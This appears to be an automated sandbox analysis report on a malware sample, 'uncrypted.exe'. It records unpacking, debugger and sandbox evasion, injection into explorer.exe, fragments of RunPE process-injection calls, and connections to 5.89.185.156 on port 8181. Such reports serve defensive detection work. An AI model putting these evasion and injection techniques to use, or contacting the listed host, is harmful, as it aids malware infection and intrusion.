                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mozglue.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: uncrypted.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: uncrypted.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\uncrypted.exeUnpacked PE file: 0.2.uncrypted.exe.9a0000.0.unpack .text:ER;.rsrc:R;.reloc:R;DeaJ6sQm:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;Unknown_Section3:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\uncrypted.exeUnpacked PE file: 0.2.uncrypted.exe.9a0000.0.unpack
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00419140 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,2_2_00419140
                    Source: uncrypted.exeStatic PE information: real checksum: 0xdf62039 should be: 0x101254
                    Source: uncrypted.exeStatic PE information: section name: DeaJ6sQm
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A6294 pushfd ; retf 0_2_009A62F8
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A708D pushfd ; retf 0_2_009A70A0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A37B0 pushfd ; retf 0_2_009A37C8
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A48B6 pushfd ; retf 0_2_009A48C4
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A52A9 push edx; retf 0_2_009A52B2
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A5FDA pushfd ; retf 0_2_009A5FF0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A3DDB pushfd ; retf 0_2_009A3DF5
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A89D1 pushfd ; retf 0_2_009A89E0
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A39CF pushfd ; retf 0_2_009A39D9
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A4EFE pushfd ; retf 0_2_009A4F6D
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A41F2 pushfd ; retf 0_2_009A420C
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A84E8 pushfd ; retf 0_2_009A84F6
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A67E5 pushfd ; retf 0_2_009A67FB
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A811A pushfd ; retf 0_2_009A8135
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A4618 pushfd ; retf 0_2_009A4626
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A521E push esi; ret 0_2_009A5221
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A7704 pushfd ; retf 0_2_009A7761
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A6C2A pushfd ; retf 0_2_009A6C34
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A7526 pushfd ; retf 0_2_009A753C
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A7B7E pushfd ; retf 0_2_009A7BF8
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A5575 pushfd ; retf 0_2_009A5589
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A4B6F pushfd ; retf 0_2_009A4BBA
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 0_2_009A5967 pushfd ; retf 0_2_009A5975
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_004390C3 push esp; ret 2_2_004390CA
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00439887 push esp; ret 2_2_0043988E
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0043993F push esp; ret 2_2_00439946
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_004399F3 push esp; ret 2_2_004399FA
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_004349BF push esp; ret 2_2_004349C6
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0042C275 push ecx; ret 2_2_0042C288
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00439ADF push esp; ret 2_2_00439AE6
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0043C35C push 840043C3h; ret 2_2_0043C365
                    Source: uncrypted.exeStatic PE information: section name: .text entropy: 7.563976267050098
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E71000 GetCommandLineW,CommandLineToArgvW,ExitProcess,RegGetValueW,ExitProcess,OpenEventW,ExitProcess,SetEvent,CloseHandle,ExitProcess,CreateMutexExW,ExitProcess,CreateEventW,ExitProcess,OpenMutexW,ExitProcess,CreateThread,ExitProcess,WaitForMultipleObjects,WaitForSingleObject,ExitProcess,4_2_00E71000
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E733A0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,wsprintfW,wsprintfW,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,MultiByteToWideChar,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,4_2_00E733A0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E7ADF0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,4_2_00E7ADF0

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49705
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00419140 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,2_2_00419140
                    Source: C:\Users\user\Desktop\uncrypted.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\{F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079} {5CEDCBBC-554C-4BAE-84C3-3B10F0FEB953}Jump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)
                    Source: C:\Users\user\Desktop\uncrypted.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_2-20726
                    Source: C:\Windows\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\Desktop\uncrypted.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
                    Source: C:\Users\user\Desktop\uncrypted.exeMemory allocated: 1210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeMemory allocated: 4D80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\explorer.exeCode function: 3_2_011ADE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,3_2_011ADE00
                    Source: C:\Users\user\Desktop\uncrypted.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-19003
                    Source: C:\Windows\explorer.exeEvaded block: after key decisiongraph_3-18301
                    Source: C:\Users\user\Desktop\uncrypted.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-20973
                    Source: C:\Users\user\Desktop\uncrypted.exeAPI coverage: 8.6 %
                    Source: C:\Windows\explorer.exeAPI coverage: 8.8 %
                    Source: C:\Users\user\Desktop\uncrypted.exe TID: 3992Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 5468Thread sleep time: -36000s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 6192Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 4564Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 1352Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0041DB70 WaitForSingleObject,LocalAlloc,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,RemoveDirectoryW,GetLastError,LocalFree,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,2_2_0041DB70
                    Source: C:\Windows\explorer.exeCode function: 3_2_011997F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,3_2_011997F0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E77EA0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,4_2_00E77EA0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E8BAE0 GetSystemInfo,4_2_00E8BAE0
                    Source: C:\Users\user\Desktop\uncrypted.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: explorer.exe, 00000003.00000003.2659448208.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291466574.0000000000F92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0n+
                    Source: explorer.exe, 00000003.00000002.3291325405.0000000000F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP`
                    Source: explorer.exe, 00000003.00000003.2659448208.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291466574.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083994285.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083946738.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084613311.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2085061884.0000000002DF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: uncrypted.exe, 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2062607921.0000000000D5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\uncrypted.exeAPI call chain: ExitProcess graph end nodegraph_2-19733
                    Source: C:\Users\user\Desktop\uncrypted.exeAPI call chain: ExitProcess graph end nodegraph_2-19805
                    Source: C:\Users\user\Desktop\uncrypted.exeAPI call chain: ExitProcess graph end nodegraph_2-19750
                    Source: C:\Users\user\Desktop\uncrypted.exeAPI call chain: ExitProcess graph end nodegraph_2-19747
                    Source: C:\Users\user\Desktop\uncrypted.exeAPI call chain: ExitProcess graph end nodegraph_2-19808
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_3-18818
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_004290CF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_004290CF
                    Source: C:\Windows\explorer.exeCode function: 3_2_011ADE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,3_2_011ADE00
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00419140 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,2_2_00419140
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_00405710 GetCurrentProcess,IsWow64Process,GetProcessHeap,2_2_00405710
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_004290CF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_004290CF
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_004281E1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004281E1
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0042BA20 SetUnhandledExceptionFilter,2_2_0042BA20
                    Source: C:\Windows\explorer.exeCode function: 3_2_011BA818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_011BA818
                    Source: C:\Windows\explorer.exeCode function: 3_2_011BE5B8 SetUnhandledExceptionFilter,3_2_011BE5B8
                    Source: C:\Windows\explorer.exeCode function: 3_2_011BC5E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_011BC5E0
                    Source: C:\Windows\explorer.exeCode function: 3_2_011C0E94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_011C0E94
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F35780 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00F35780
                    Source: C:\Windows\explorer.exeCode function: 4_2_00F32970 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00F32970
                    Source: C:\Users\user\Desktop\uncrypted.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 5.89.185.156 8181Jump to behavior
                    .NET source code references suspicious native API functions
                    Source: 0.2.uncrypted.exe.3e07fa0.5.raw.unpack, RunPE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 4 + 4, ref buffer, 4, ref bytesRead)
                    Source: 0.2.uncrypted.exe.3e07fa0.5.raw.unpack, RunPE.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
